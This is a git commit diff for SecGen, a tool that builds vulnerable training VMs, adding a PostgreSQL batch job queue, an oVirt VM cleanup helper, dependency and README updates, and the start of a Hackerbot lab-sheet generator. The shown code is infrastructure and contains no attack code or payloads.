hackerbot merge - includes lots of other changes

thomashaw
2018-02-08 13:14:20 +00:00
parent 89263d28a7
commit 6045c1f187
1301 changed files with 127929 additions and 581 deletions

.gitignore

@@ -4,5 +4,6 @@ unusedcode
.idea
mount
log
batch/failed/
batch/successful/
.directory
batch/failed
batch/successful


@@ -14,6 +14,11 @@ gem 'sshkey'
gem 'zipruby'
gem 'credy'
gem 'pg'
gem 'cinch'
gem 'nori'
gem 'programr', :git => "http://github.com/robertjwhitney/programr.git"
gem 'process_helper'
gem 'ovirt-engine-sdk'
#development only gems go here
group :test, :development do


@@ -1,8 +1,15 @@
GIT
remote: http://github.com/robertjwhitney/programr.git
revision: 9885f3870407f57c3e2ca1fe644ed10573629ca6
specs:
programr (0.0.2)
GEM
remote: https://rubygems.org/
specs:
CFPropertyList (2.2.8)
chunky_png (1.3.8)
cinch (2.3.3)
credy (0.2.1)
thor (~> 0.19.1)
facter (2.4.6)
@@ -35,8 +42,12 @@ GEM
nokogiri (1.6.8)
mini_portile2 (~> 2.1.0)
pkg-config (~> 1.1.7)
nori (2.6.0)
ovirt-engine-sdk (4.1.8)
json
pg (0.21.0)
pkg-config (1.1.7)
process_helper (0.1.1)
puppet (4.5.1)
CFPropertyList (~> 2.2.6)
facter (> 2.0, < 4)
@@ -69,6 +80,7 @@ PLATFORMS
ruby
DEPENDENCIES
cinch
credy
faker
forgery
@@ -76,7 +88,11 @@ DEPENDENCIES
mini_exiftool_vendored
minitest
nokogiri
nori
ovirt-engine-sdk
pg
process_helper
programr!
puppet
rake
rdoc
@@ -89,4 +105,4 @@ DEPENDENCIES
zipruby
BUNDLED WITH
1.14.3
1.15.4


@@ -3,9 +3,10 @@
## Summary
SecGen creates vulnerable virtual machines so students can learn security penetration testing techniques.
Boxes like Metasploitable2 are always the same, this project uses Vagrant, Puppet, and Ruby to quickly create randomly vulnerable virtual machines that can be used for learning or for hosting CTF events.
Boxes like Metasploitable2 are always the same; this project uses Vagrant, Puppet, and Ruby to create randomly vulnerable virtual machines that can be used for learning or for hosting CTF events.
[The latest version is available at: http://github.com/cliffe/SecGen/](http://github.com/cliffe/SecGen/)
## Introduction
Computer security students benefit from engaging in hacking challenges. Practical lab work and pre-configured hacking challenges are common practice both in security education and as a pastime for security-minded individuals. Competitive hacking challenges, such as capture the flag (CTF) competitions, have become a mainstay at industry conferences and are the focus of large online communities. Virtual machines (VMs) provide an effective way of sharing targets for hacking, and can be designed to test the skills of the attacker. Websites such as Vulnhub host pre-configured hacking challenge VMs and are a valuable resource for those learning and advancing their skills in computer security. However, developing these hacking challenges is time-consuming, and once created they are essentially static. That is, once the challenge has been "solved" there is no remaining challenge for the student, and if the challenge is created for a competition or assessment, it cannot be reused without risking plagiarism and collusion.
@@ -22,32 +23,32 @@ SecGen contains modules, which install various software packages. Each SecGen mo
SecGen is developed and tested on Ubuntu Linux. In theory, SecGen should run on Mac or Windows, if you have all the required software installed.
You will need to install the following:
- Ruby (development): https://www.ruby-lang.org/en/
- Vagrant: http://www.vagrantup.com/
- Virtual Box: https://www.virtualbox.org/
- Puppet: http://puppet.com/
- Packer: https://www.packer.io/downloads.html
- Packer: https://www.packer.io/
- ImageMagick: https://www.imagemagick.org/
- And the required Ruby Gems (including Nokogiri and Librarian-puppet)
### On Ubuntu these commands will get you up and running
Install all the required packages:
```bash
sudo apt-get install ruby-dev zlib1g-dev liblzma-dev build-essential patch virtualbox ruby-bundler vagrant imagemagick libmagickwand-dev exiftool libpq-dev
# install a recent version of vagrant
wget https://releases.hashicorp.com/vagrant/1.9.8/vagrant_1.9.8_x86_64.deb
sudo apt install ./vagrant_1.9.8_x86_64.deb
# install other required packages via repos
sudo apt-get install ruby-dev zlib1g-dev liblzma-dev build-essential patch virtualbox ruby-bundler imagemagick libmagickwand-dev exiftool libpq-dev
```
Copy SecGen to a directory of your choosing, such as */home/user/bin/SecGen*, then:
Copy SecGen to a directory of your choosing, such as */home/user/bin/SecGen*
Then install gems:
```bash
cd /home/user/bin/SecGen
bundle install
```
## Optional software requirements
### EWF image creation
To generate forensic images in the EWF format, the FTK Imager command-line tool is required.
Download link for FTK Imager command line: http://accessdata.com/product-download/
Note: The FTK Imager executable needs to be added to the PATH environment variable.
## Usage
Basic usage:
```bash
@@ -426,6 +427,9 @@ It is also possible to iterate through a datastore, and feed each value into sep
Some generators generate structured content in JSON format, for example the organisation type. It is possible to access a particular element of structured data from a datastore with access_json, using the Ruby hash lookup format. See the example scenario:
```scenarios/examples/datastore_examples/json_selection_example.xml```
Some scenarios require VMs' IP addresses to be used as parameters for other modules in the scenario. If this is the case, you should use the 'IP_addresses' datastore to store the IPs for all VMs in the scenario and use the access functionality to pass them into network modules. For example:
```scenarios/examples/datastore_examples/network_ip_datastore_example.xml```
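The Ruby hash lookup format mentioned above is ordinary Hash and Array indexing on the parsed JSON. A minimal standalone sketch (the organisation structure below is invented for illustration and is not SecGen's actual schema):

```ruby
require 'json'

# Invented example of structured generator output, loosely an 'organisation'
json = '{"organisation": {"name": "ACME", "employees": [{"name": "Ada"}, {"name": "Bob"}]}}'
data = JSON.parse(json)

# The hash lookup format chains keys and indexes to reach one element
puts data['organisation']['name']
puts data['organisation']['employees'][1]['name']
```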
## Modules
SecGen is designed to be easily extendable with modules that define vulnerabilities and other kinds of software, configuration, and content changes.

lib/batch/README.md

@@ -0,0 +1,103 @@
# Batch Processing with SecGen
Generating multiple VMs in a batch is now possible through the use of batch_secgen, a Ruby script which uses PostgreSQL
as a job queue to mass-create VMs with SecGen.
There are helper commands available to add jobs, list jobs in the table, remove jobs, and reset the status of jobs from 'running' or 'error' to 'todo'.
When adding multiple jobs to the queue, it is possible to prefix the VM names with unique strings.
The example below demonstrates adding 3 copies of the flawed_fortress scenario, which results in the VM names being prefixed with 'tom_', 'cliffe_', and 'aimee_'.
```
ruby batch_secgen.rb add --instances tom,cliffe,aimee --- -s scenarios/ctf/flawed_fortress_1.xml run
```
## Initialise the Database
Install PostgreSQL
```
sudo apt-get install postgresql
```
Add a database role for your user and grant it superuser permissions.
```
sudo -u postgres createuser <username>
sudo -u postgres psql -c "ALTER ROLE <username> SUPERUSER;"
```
Create the database
```
sudo -u postgres createdb batch_secgen
```
Replace 'username' within the lib/batch/batch_secgen.sql dump with your database username on lines 131 and 141
```
...
128: REVOKE ALL ON TABLE queue FROM PUBLIC;
129: REVOKE ALL ON TABLE queue FROM postgres;
130: GRANT ALL ON TABLE queue TO postgres;
131: GRANT ALL ON TABLE queue TO username; # << replace with database username
...
138: REVOKE ALL ON SEQUENCE queue_id_seq FROM PUBLIC;
139: REVOKE ALL ON SEQUENCE queue_id_seq FROM postgres;
140: GRANT ALL ON SEQUENCE queue_id_seq TO postgres;
141: GRANT SELECT,USAGE ON SEQUENCE queue_id_seq TO username; # << replace with database username
...
```
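The substitution can also be scripted rather than edited by hand. A minimal Ruby sketch (the two-line sample stands in for the full dump, and the 'secgen' role name is an assumed example):

```ruby
# Stand-in for the grant lines shown above from lib/batch/batch_secgen.sql
sample = <<~SQL
  GRANT ALL ON TABLE queue TO username;
  GRANT SELECT,USAGE ON SEQUENCE queue_id_seq TO username;
SQL

db_user = 'secgen' # replace with your database username
patched = sample.gsub(/\busername\b/, db_user)
puts patched
```

Applying `gsub` to the contents of the real file (read with `File.read`, written back with `File.write`) achieves the same result as the manual edit.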
Import the modified SQL file
```
psql -U <username> batch_secgen < lib/batch/batch_secgen.sql
```
## Using batch_secgen.rb
COMMANDS:
add, a: Adds a job to the queue
start: Starts the service, works through the job queue
reset: Resets jobs in the table to 'todo' status based on option
delete: Delete job(s) from the queue table
list: Lists the current entries in the job queue
OPTIONS:
[add]
--instances [integer n]: Number of instances of the scenario to create with default project naming format
--instances [prefix,prefix, ...]: Alternatively supply a comma separated list of strings to prefix to project output
--randomise-ips [integer n] (optional): Randomises the IP ranges (10.X.X.0), unique across all instances;
n should match the number of unique static network tags in the scenario.xml
---: Delimiter, anything after this will be passed to secgen.rb as an argument.
Example: `ruby batch_secgen.rb add --instances here,are,some,prefixes --- -s scenarios/default_scenario.xml run`
[start]
--max_threads [integer n] (optional): Maximum number of worker threads, defaults to 3
[reset]
--running: Reset all 'running' jobs to 'todo'
--failed / --error: Reset all failed (i.e. status => 'error') jobs to 'todo'
[delete]
--id [integer n]: Delete the entry for a specific Job ID
--all: Delete all jobs from the queue table
[list]
--id [integer n] (optional): List the entry for a specific Job ID
--all: List all jobs in the queue table
[misc]
--help, -h: Shows this usage information
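The --randomise-ips option described above amounts to drawing 10.X.X.0 ranges that no other instance has used yet. A minimal sketch of that uniqueness loop (the helper names are illustrative simplifications of the script's internals):

```ruby
# Draw a candidate 10.X.X.0 network range at random
def generate_range
  "10.#{rand(256)}.#{rand(256)}.0"
end

# Collect n ranges, retrying whenever a candidate was already taken
def unique_ranges(n, taken = [])
  fresh = []
  n.times do
    range = generate_range
    range = generate_range while taken.include?(range)
    taken << range
    fresh << range
  end
  fresh
end

puts "--network-ranges #{unique_ranges(3).join(',')}"
```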
## Install the service to run batch-secgen in the background
Install the lib/batch/batch-secgen.service systemd service file.
```
sudo systemctl enable /absolute/path/to/SecGen/lib/batch/batch-secgen.service
sudo systemctl start batch-secgen
```


@@ -0,0 +1,16 @@
[Unit]
Description=Batch Processing Service (SecGen Project)
After=postgresql.service
[Service]
EnvironmentFile=/etc/environment
ExecStart=/usr/bin/ruby /home/secgen/SecGen/lib/batch/batch_secgen.rb start
ExecReload=/bin/kill -HUP $MAINPID
KillMode=process
WorkingDirectory=/home/secgen/SecGen/
Restart=always
User=secgen
Group=secgen
[Install]
WantedBy=multi-user.target


@@ -1,3 +1,4 @@
require 'fileutils'
require 'getoptlong'
require 'open3'
require 'pg'
@@ -6,8 +7,10 @@ require_relative '../helpers/print.rb'
require_relative '../helpers/constants.rb'
# Globals
@db_conn = nil
@status_enum = {:todo => 'todo', :running => 'running', :success => 'success', :error => 'error', :failed => 'error'}
@prepared_statements = []
@secgen_args = ''
@ranges_in_table = nil
# Displays secgen_batch usage data
def usage
@@ -17,8 +20,9 @@ def usage
COMMANDS:
add, a: Adds a job to the queue
start: Starts the service, works through the job queue
list: Lists the current entries in the job queue
reset: Resets jobs in the table to 'todo' status based on option
delete: Delete job(s) from the queue table
list: Lists the current entries in the job queue
OPTIONS:
[add]
@@ -32,14 +36,22 @@ def usage
[start]
--max_threads [integer n] (optional): Maximum number of worker threads, defaults to 3
[list]
--id [integer n] (optional): List the entry for a specific Job ID
--all: List all jobs in the queue table
[reset]
--running: Reset all 'running' jobs to 'todo'
--failed / --error: Reset all failed (i.e. status => 'error') jobs to 'todo'
[delete]
--id [integer n]: Delete the entry for a specific Job ID
--all: Delete all jobs from the queue table
[list]
--all (default): List all jobs in the queue table
--id [integer n] (optional): List the entry for a specific Job ID
--todo (optional): List jobs with status 'todo'
--running (optional): List jobs with status 'running'
--success (optional): List jobs with status 'success'
--failed / --error (optional): List jobs with status 'error'
[misc]
--help, -h: Shows this usage information
@@ -70,15 +82,34 @@ end
def get_list_opts
list_options = misc_opts + [['--id', GetoptLong::REQUIRED_ARGUMENT],
['--all', GetoptLong::OPTIONAL_ARGUMENT]]
['--all', GetoptLong::OPTIONAL_ARGUMENT],
['--todo', GetoptLong::NO_ARGUMENT],
['--running', GetoptLong::NO_ARGUMENT],
['--success', GetoptLong::NO_ARGUMENT],
['--failed', '--error', GetoptLong::NO_ARGUMENT]]
parse_opts(GetoptLong.new(*list_options))
end
def get_reset_opts
list_options = misc_opts + [['--all', GetoptLong::NO_ARGUMENT],
['--running', GetoptLong::NO_ARGUMENT],
['--failed', '--error', GetoptLong::NO_ARGUMENT]]
options = parse_opts(GetoptLong.new(*list_options))
if !options[:running] and !options[:failed] and !options[:all]
Print.err 'Error: The reset command requires an argument.'
usage
else
options
end
end
def get_delete_opts
delete_options = misc_opts + [['--id', GetoptLong::REQUIRED_ARGUMENT],
['--all', GetoptLong::OPTIONAL_ARGUMENT]]
['--all', GetoptLong::OPTIONAL_ARGUMENT],
['--failed', GetoptLong::OPTIONAL_ARGUMENT]]
options = parse_opts(GetoptLong.new(*delete_options))
if options[:id] == '' and options[:all] == false
if !options[:id] and !options[:all] and !options[:failed]
Print.err 'Error: The delete command requires an argument.'
usage
else
@@ -87,7 +118,7 @@ def get_delete_opts
end
def parse_opts(opts)
options = {:instances => '', :max_threads => 1, :id => '', :all => false}
options = {:instances => '', :max_threads => 3, :id => nil, :all => false}
opts.each do |opt, arg|
case opt
when '--instances'
@@ -100,6 +131,14 @@ def parse_opts(opts)
options[:random_ips] = arg.to_i
when '--all'
options[:all] = true
when '--todo'
options[:todo] = true
when '--running'
options[:running] = true
when '--success'
options[:success] = true
when '--failed'
options[:failed] = true
else
Print.err 'Invalid argument'
exit(false)
@@ -111,164 +150,295 @@ end
# Command Functions
def add(options)
db_conn = PG::Connection.open(:dbname => 'batch_secgen')
# Handle --instances
instances = options[:instances]
if (instances.to_i.to_s == instances) and instances.to_i > 1
if (instances.to_i.to_s == instances) and instances.to_i >= 1
instances.to_i.times do |count|
instance_args = "--prefix batch_job_#{(count+1).to_s} " + @secgen_args
instance_args = generate_range_arg(options) + instance_args
insert_row(count.to_s, instance_args)
instance_args = generate_range_arg(db_conn, options) + instance_args
insert_row(db_conn, @prepared_statements, count.to_s, instance_args)
end
elsif instances.include?(',')
elsif instances.size > 0
named_prefixes = instances.split(',')
named_prefixes.each_with_index do |named_prefix, count|
instance_secgen_args = "--prefix #{named_prefix} " + @secgen_args
instance_secgen_args = generate_range_arg(options) + instance_secgen_args
insert_row(count.to_s, instance_secgen_args)
instance_secgen_args = generate_range_arg(db_conn, options) + instance_secgen_args
insert_row(db_conn, @prepared_statements, count.to_s, instance_secgen_args)
end
else
insert_row('batch_job_1', @secgen_args)
end
db_conn.finish
end
def start(options)
# Start in SecGen's ROOT_DIR
Dir.chdir ROOT_DIR
# Create directories
Dir.mkdir 'log' unless Dir.exists? 'log'
FileUtils.mkdir_p 'batch/successful' unless Dir.exists? 'batch/successful'
FileUtils.mkdir_p 'batch/failed' unless Dir.exists? 'batch/failed'
# Start the service and call secgen.rb
current_threads = []
outer_loop_db_conn = PG::Connection.open(:dbname => 'batch_secgen')
while true
if (get_jobs.size > 0) and (current_threads.size < options[:max_threads].to_i)
if (get_jobs(outer_loop_db_conn, @prepared_statements).size > 0) and (current_threads.size < options[:max_threads].to_i)
current_threads << Thread.new {
current_job = get_jobs[0]
db_conn = PG::Connection.open(:dbname => 'batch_secgen')
threadwide_statements = []
current_job = get_jobs(db_conn, threadwide_statements)[0]
job_id = current_job['id']
update_status(job_id, :running)
update_status(db_conn, threadwide_statements, job_id, :running)
secgen_args = current_job['secgen_args']
# execute secgen
puts "Running job_id(#{job_id}): secgen.rb #{secgen_args}"
stdout, stderr, status = Open3.capture3("ruby secgen.rb #{secgen_args}")
puts "Job #{job_id} Complete"
# Update job status and back-up paths
if status.exitstatus == 0
update_status(job_id, :success)
puts "Job #{job_id} Complete: successful"
update_status(db_conn, threadwide_statements, job_id, :success)
log_prefix = ''
backup_path = 'batch/successful/'
else
update_status(job_id, :error)
puts "Job #{job_id} Complete: failed"
update_status(db_conn, threadwide_statements, job_id, :error)
log_prefix = 'ERROR_'
backup_path = 'batch/failed/'
end
# Get project data from SecGen output
project_id = project_path = 'unknown'
stderr_project_split = stdout.split('Creating project: ')
if stderr_project_split.size > 1
project_path = stderr_project_split[1].split('...')[0]
project_id = project_path.split('projects/')[1]
else
project_id = "job_#{job_id}"
Print.err(stderr)
Print.err("Fatal error on job #{job_id}: SecGen crashed before project creation.")
Print.err('Check your scenario file.')
end
# Log output
Dir.mkdir 'log' unless Dir.exists? 'log'
project_path = stdout.split('Creating project: ')[1].split('...')[0]
project_id = project_path.split('projects/')[1]
log = File.new("log/#{log_prefix}#{project_id}", 'w')
log_name = "#{log_prefix}#{project_id}"
log_path = "log/#{log_name}"
log = File.new(log_path, 'w')
log.write("SecGen project path::: #{project_path}\n\n\n")
log.write("SecGen arguments::: #{secgen_args}\n\n\n")
log.write("SecGen output::: \n\n\n")
log.write("SecGen output (stdout)::: \n\n\n")
log.write(stdout)
log.write("\n\n\nGenerator local output::: \n\n\n")
log.write("\n\n\nGenerator local output and errors (stderr)::: \n\n\n")
log.write(stderr)
log.close
# Back up project and log file
FileUtils.cp_r(project_path, backup_path)
FileUtils.cp(log_path, (backup_path + project_id + '/' + log_name))
db_conn.finish
}
sleep(1)
sleep(5)
else
current_threads.delete_if { |thread| !thread.alive? }
sleep(2) # don't use a busy-waiting loop, choose a blocking sleep that frees up CPU
sleep(5) # don't use a busy-waiting loop, choose a blocking sleep that frees up CPU
end
end
end
def list(options)
if options[:id] == ''
items = select_all
items.each do |row|
Print.info row
end
else
Print.info select_id(options[:id])
db_conn = PG::Connection.open(:dbname => 'batch_secgen')
if options[:id]
items = [select_id(db_conn, @prepared_statements, options[:id])]
elsif options[:todo]
items = select_status(db_conn, @prepared_statements, :todo)
elsif options[:running]
items = select_status(db_conn, @prepared_statements, :running)
elsif options[:success]
items = select_status(db_conn, @prepared_statements, :success)
elsif options[:failed]
items = select_status(db_conn, @prepared_statements, :failed)
else #all
items = select_all(db_conn)
end
items.each do |row|
Print.info row
end
db_conn.finish
end
# reset jobs in batch to status => 'todo'
def reset(options)
db_conn = PG::Connection.open(:dbname => 'batch_secgen')
if options[:all]
update_all_to_status(db_conn, @prepared_statements, :todo)
end
if options[:running]
update_all_by_status(db_conn, @prepared_statements, :running, :todo)
end
if options[:failed]
update_all_by_status(db_conn, @prepared_statements, :error, :todo)
end
db_conn.finish
end
def delete(options)
if options[:id] != ''
delete_id(options[:id])
db_conn = PG::Connection.open(:dbname => 'batch_secgen')
if options[:id]
delete_id(db_conn, @prepared_statements, options[:id])
elsif options[:failed]
delete_failed(db_conn)
elsif options[:all]
delete_all
delete_all(db_conn)
end
end
def get_jobs
select_all_todo.to_a
db_conn.finish
end
# Database interactions
def insert_row(statement_id, secgen_args)
def insert_row(db_conn, prepared_statements, statement_id, secgen_args)
statement = "insert_row_#{statement_id}"
# Add --shutdown and strip trailing whitespace
secgen_args = '--shutdown ' + secgen_args.strip
Print.info "Adding to queue: '#{statement}' '#{secgen_args}' 'todo'"
@db_conn.prepare(statement, 'insert into queue (secgen_args, status) values ($1, $2)')
@db_conn.exec_prepared(statement, [secgen_args, 'todo'])
unless prepared_statements.include? statement
db_conn.prepare(statement, 'insert into queue (secgen_args, status) values ($1, $2)')
prepared_statements << statement
end
db_conn.exec_prepared(statement, [secgen_args, 'todo'])
end
def select_all
@db_conn.exec_params('SELECT * FROM queue;')
def select_all(db_conn)
db_conn.exec_params('SELECT * FROM queue;')
end
def select_all_todo
@db_conn.exec_params("SELECT * FROM queue where status = 'todo';")
def select_status(db_conn, prepared_statements, status)
statement = "select_status_#{status}"
unless prepared_statements.include? statement
db_conn.prepare(statement, 'SELECT * FROM queue where status = $1;')
prepared_statements << statement
end
db_conn.exec_prepared(statement, [@status_enum[status]])
end
def select_id(id)
def select_id(db_conn, prepared_statements, id)
statement = "select_id_#{id}"
@db_conn.prepare(statement, 'SELECT * FROM queue where id = $1;')
@db_conn.exec_prepared(statement, [id]).first
unless prepared_statements.include? statement
db_conn.prepare(statement, 'SELECT * FROM queue where id = $1;')
prepared_statements << statement
end
db_conn.exec_prepared(statement, [id]).first
end
def update_status(job_id, status)
status_enum = {:todo => 'todo', :running => 'running', :success => 'success', :error => 'error'}
def update_status(db_conn, prepared_statements, job_id, status)
statement = "update_status_#{job_id}_#{status}"
@db_conn.prepare(statement, 'UPDATE queue SET status = $1 WHERE id = $2')
@db_conn.exec_prepared(statement,[status_enum[status], job_id])
unless prepared_statements.include? statement
db_conn.prepare(statement, 'UPDATE queue SET status = $1 WHERE id = $2')
prepared_statements << statement
end
db_conn.exec_prepared(statement, [@status_enum[status], job_id])
end
def delete_all
Print.info 'Are you sure you want to DELETE all jobs from the queue table? [y/N]'
def update_all_by_status(db_conn, prepared_statements, from_status, to_status)
statement = "mass_update_status_#{from_status}_#{to_status}"
unless prepared_statements.include? statement
db_conn.prepare(statement, 'UPDATE queue SET status = $1 WHERE status = $2')
prepared_statements << statement
end
db_conn.exec_prepared(statement, [@status_enum[to_status], @status_enum[from_status]])
end
def update_all_to_status(db_conn, prepared_statements, to_status)
statement = "mass_update_to_status_#{to_status}"
unless prepared_statements.include? statement
db_conn.prepare(statement, 'UPDATE queue SET status = $1')
prepared_statements << statement
end
db_conn.exec_prepared(statement, [@status_enum[to_status]])
end
def delete_failed(db_conn)
Print.info 'Are you sure you want to DELETE failed jobs from the queue table? [y/N]'
input = STDIN.gets.chomp
if input == 'Y' or input == 'y'
Print.info 'Deleting all jobs from Queue table'
@db_conn.exec_params('DELETE FROM queue;')
Print.info "Deleting all jobs with status == 'error' from Queue table"
db_conn.exec_params("DELETE FROM queue WHERE status = 'error';")
else
exit
end
end
def delete_id(id)
Print.info "Deleting job_id: #{id}"
statement = "delete_job_id_#{id}"
@db_conn.prepare(statement, 'DELETE FROM queue where id = $1')
@db_conn.exec_prepared(statement, [id])
def delete_all(db_conn)
Print.info 'Are you sure you want to DELETE all jobs from the queue table? [y/N]'
input = STDIN.gets.chomp
if input == 'Y' or input == 'y'
Print.info 'Deleting all jobs from Queue table'
db_conn.exec_params('DELETE FROM queue;')
else
exit
end
end
def generate_range_arg(options)
def delete_id(db_conn, prepared_statements, id)
Print.info "Deleting job_id: #{id}"
statement = "delete_job_id_#{id}"
unless prepared_statements.include? statement
db_conn.prepare(statement, 'DELETE FROM queue where id = $1')
prepared_statements << statement
end
db_conn.exec_prepared(statement, [id])
end
def get_jobs(db_conn, prepared_statements)
select_status(db_conn, prepared_statements, :todo).to_a
end
def secgen_arg_network_ranges(secgen_args)
ranges_in_arg = []
split_args = secgen_args.split(' ')
network_ranges_index = split_args.find_index('--network-ranges')
if network_ranges_index != nil
range = split_args[network_ranges_index + 1]
if range.include?(',')
range.split(',').each { |split_range| ranges_in_arg << split_range }
else
ranges_in_arg << range
end
end
ranges_in_arg
end
def generate_range_arg(db_conn, options)
range_arg = ''
if options.has_key? :random_ips
network_ranges = []
# Check if there are jobs in the DB containing ips. Assign once so that repeated calls don't get added to the list.
if @ranges_in_table == nil
@ranges_in_table = []
# Exclude IP ranges previously selected, stored in the table
table_entries = select_all(db_conn)
table_entries.each { |job|
@ranges_in_table += secgen_arg_network_ranges(job['secgen_args'])
}
end
generated_network_ranges = []
scenario_networks_qty = options[:random_ips]
scenario_networks_qty.times {
range = generate_range
# Check for uniqueness
while network_ranges.include?(range)
while @ranges_in_table.include?(range)
range = generate_range
end
network_ranges << range
@ranges_in_table << range
generated_network_ranges << range
}
random_ip_string = network_ranges.join(',')
random_ip_string = generated_network_ranges.join(',')
range_arg = "--network-ranges #{random_ip_string} "
end
range_arg
@@ -282,9 +452,6 @@ Print.std '~'*47
Print.std 'SecGen Batch - Batch VM Generation Service'
Print.std '~'*47
# Connect to database
@db_conn = PG::Connection.open(:dbname => 'batch_secgen')
# Capture SecGen options
delimiter_index = ARGV.find_index('---')
if delimiter_index
@@ -305,8 +472,10 @@ case ARGV[0]
start(get_start_opts)
when 'list'
list(get_list_opts)
when 'reset'
reset(get_reset_opts)
when 'delete'
delete(get_delete_opts)
else
usage
end
end


@@ -1,13 +0,0 @@
[Unit]
Description=Batch Processing Service (SecGen Project)
After=postgresql.service
[Service]
ExecStart=/usr/bin/ruby /opt/secgen/lib/batch/batch_secgen.rb
ExecReload=/bin/kill -HUP $MAINPID
KillMode=process
WorkingDirectory=/opt/secgen
Restart=always
[Install]
WantedBy=multi-user.target


@@ -1,4 +1,5 @@
require 'rubygems'
require 'process_helper'
class GemExec
@@ -8,8 +9,8 @@ class GemExec
# @param [Object] gem_name -- such as 'vagrant', 'puppet', 'librarian-puppet'
# @param [Object] working_dir -- the location for output
# @param [Object] argument -- the command to send 'init', 'install'
def self.exe(gem_name, working_dir, argument)
Print.std "Loading #{gem_name} (#{argument}) in #{working_dir}"
def self.exe(gem_name, working_dir, arguments)
Print.std "Loading #{gem_name} (#{arguments}) in #{working_dir}"
version = '>= 0'
begin
@@ -36,8 +37,24 @@ class GemExec
end
Dir.chdir(working_dir)
system gem_path, argument
output_hash = {:output => '', :status => 0, :exception => nil}
begin
output_hash[:output] = ProcessHelper.process("#{gem_path} #{arguments}", {:pty => true, :timeout => (60 * 10),
include_output_in_exception: true})
rescue Exception => ex
output_hash[:status] = 1
output_hash[:exception] = ex
if ex.class == ProcessHelper::UnexpectedExitStatusError
output_hash[:output] = ex.to_s.split('Command output: ')[1]
Print.err 'Non-zero exit status...'
elsif ex.class == ProcessHelper::TimeoutError
Print.err 'Timeout: Killing process...'
sleep(30)
output_hash[:output] = ex.to_s.split('Command output prior to timeout: ')[1]
else
output_hash[:output] = nil
end
end
output_hash
end
end

lib/helpers/ovirt.rb

@@ -0,0 +1,130 @@
require 'timeout'
require 'rubygems'
require 'process_helper'
require 'ovirtsdk4'
require_relative './print.rb'
class OVirtFunctions
# Helper for removing VMs which Vagrant lost track of, i.e. exist but are reported as 'have not been created'.
# @param [String] destroy_output_log -- logfile from vagrant destroy process which contains loose VMs
# @param [String] options -- command-line opts, used for building oVirt connection
def self.remove_uncreated_vms(destroy_output_log, options, scenario)
retry_count = 0
max_retries = 5
while retry_count <= max_retries
begin
# Build an ovirt connection
ovirt_connection = get_ovirt_connection(options)
# Determine the oVirt name of the uncreated VMs and Build the oVirt VM names
ovirt_vm_names = build_ovirt_names(scenario, options[:prefix], get_uncreated_vms(destroy_output_log))
ovirt_vm_names.each do |vm_name|
# Find the oVirt VM objects
vms = vms_service(ovirt_connection).list(search: "name=#{vm_name}")
# Shut down and remove the VMs
vms.each do |vm|
begin
Timeout.timeout(60*5) do
while vm_exists(ovirt_connection, vm)
shutdown_vm(ovirt_connection, vm)
remove_vm(ovirt_connection, vm)
end
Print.info 'Successfully removed VM: ' + vm.name + ' -- ID: ' + vm.id
end
rescue Timeout::Error
Print.err "Error: Removal of #{vm.name} timed-out. (ID: #{vm.id})"
next
end
end
end
rescue OvirtSDK4::Error => ex
if retry_count < max_retries
Print.err 'Error: Retrying... #' + (retry_count + 1).to_s + ' of #' + max_retries.to_s
end
retry_count += 1
puts ex
end
end
end
def self.vm_exists(ovirt_connection, vm)
# Check if VM has been removed
begin
service = vms_service(ovirt_connection).vm_service(vm.id)
service.get
return true
rescue OvirtSDK4::Error => err
if err.code == 404
return false
else
puts err
exit(1)
end
end
end
def self.vms_service(ovirt_connection)
ovirt_connection.system_service.vms_service
end
def self.shutdown_vm(ovirt_connection, vm)
service = vms_service(ovirt_connection).vm_service(vm.id)
while service.get.status == 'up'
service.stop
puts 'Stopping VM: ' + vm.name
sleep(15)
end
end
def self.remove_vm(ovirt_connection, vm)
service = vms_service(ovirt_connection).vm_service(vm.id)
begin
service.remove(force: true)
puts 'Removing VM: ' + vm.name
sleep(15)
rescue Exception
# ignore oVirt exception, it gets raised regardless of success / failure
end
end
def self.build_ovirt_names(scenario_path, prefix, vm_names)
ovirt_vm_names = []
scenario_name = scenario_path.split('/').last.split('.').first
prefix = prefix ? (prefix + '-' + scenario_name) : ('SecGen-' + scenario_name)
vm_names.each do |vm_name|
ovirt_vm_names << "#{prefix}-#{vm_name}".tr('_', '-')
end
ovirt_vm_names
end
def self.get_uncreated_vms(output_log)
split = output_log.split('==> ')
failures = []
split.each do |line|
if line.include? ': VM is not created. Please run `vagrant up` first.'
failed_vm = line.split(':').first
failures << failed_vm
end
end
failures.uniq
end
# @param [String] options -- command-line opts, contains oVirt username, password and url
def self.get_ovirt_connection(options)
if options[:ovirtuser] and options[:ovirtpass] and options[:ovirturl]
conn_attr = {}
conn_attr[:url] = options[:ovirturl]
conn_attr[:username] = options[:ovirtuser]
conn_attr[:password] = options[:ovirtpass]
conn_attr[:debug] = true
conn_attr[:insecure] = true
conn_attr[:headers] = {'Filter' => true}
OvirtSDK4::Connection.new(conn_attr)
else
Print.err('Fatal: oVirt connections require values for the --ovirturl, --ovirtuser and --ovirtpass command line arguments')
exit(1)
end
end
end


@@ -0,0 +1,114 @@
#!/usr/bin/ruby
require_relative 'local_string_generator.rb'
require 'erb'
require 'fileutils'
require 'redcarpet'
require 'nokogiri'
class HackerbotConfigGenerator < StringGenerator
attr_accessor :accounts
attr_accessor :flags
attr_accessor :root_password
attr_accessor :html_rendered
attr_accessor :html_TOC_rendered
attr_accessor :title
attr_accessor :local_dir
attr_accessor :templates_path
attr_accessor :config_template_path
attr_accessor :html_template_path
def initialize
super
self.module_name = 'Hackerbot Config Generator'
self.title = ''
self.accounts = []
self.flags = []
self.root_password = ''
self.html_rendered = ''
self.html_TOC_rendered = ''
self.local_dir = File.expand_path('../../', __FILE__)
self.templates_path = "#{self.local_dir}/templates/"
self.config_template_path = "#{self.local_dir}/templates/integrity_lab.xml.erb"
self.html_template_path = "#{self.local_dir}/templates/labsheet.html.erb"
end
def get_options_array
super + [['--root_password', GetoptLong::REQUIRED_ARGUMENT],
['--accounts', GetoptLong::REQUIRED_ARGUMENT],
['--flags', GetoptLong::REQUIRED_ARGUMENT]]
end
def process_options(opt, arg)
super
case opt
when '--root_password'
self.root_password << arg;
when '--accounts'
self.accounts << arg;
when '--flags'
self.flags << arg;
end
end
def generate_lab_sheet(xml_config)
lab_sheet = ''
begin
doc = Nokogiri::XML(xml_config)
rescue
Print.err "Failed to process hackerbot config"
exit
end
# remove xml namespaces for ease of processing
doc.remove_namespaces!
# for each element in the vulnerability
hackerbot = doc.xpath("/hackerbot")
name = hackerbot.xpath("name").first.content
lab_sheet += hackerbot.xpath("tutorial_info/tutorial").first.content + "\n"
doc.xpath("//attack").each_with_index do |attack, index|
